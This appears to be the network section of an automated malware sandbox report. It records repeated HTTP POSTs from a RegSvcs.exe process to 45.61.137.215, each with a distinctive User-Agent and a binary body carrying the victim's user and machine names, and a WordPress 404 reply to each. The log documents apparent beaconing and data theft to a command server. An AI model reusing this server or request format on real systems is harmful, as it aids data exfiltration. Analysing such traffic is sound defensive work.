May 29, 2024 15:43:03.639303923 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:01 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:03.639317989 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:43:03.639338970 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:43:03.639355898 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:43:03.639367104 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:43:03.639380932 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:43:03.639555931 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:03.639565945 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:43:03.639575958 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:43:03.639590025 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49735	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:03.791896105 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:03.796905041 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:06.300982952 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:04 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:06.301000118 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:43:06.301019907 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:43:06.301032066 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:43:06.301047087 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:43:06.301058054 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:43:06.301127911 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:06.301223993 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:06.301235914 CEST	1236	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:06.301246881 CEST	1236	IN	Data Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49736	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:06.437304020 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:06.442362070 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:09.134901047 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:07 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:09.134921074 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:09.134934902 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:09.134947062 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:09.134958029 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:09.135004044 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:09.135015011 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:09.135026932 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:09.135085106 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:09.135093927 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	49737	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
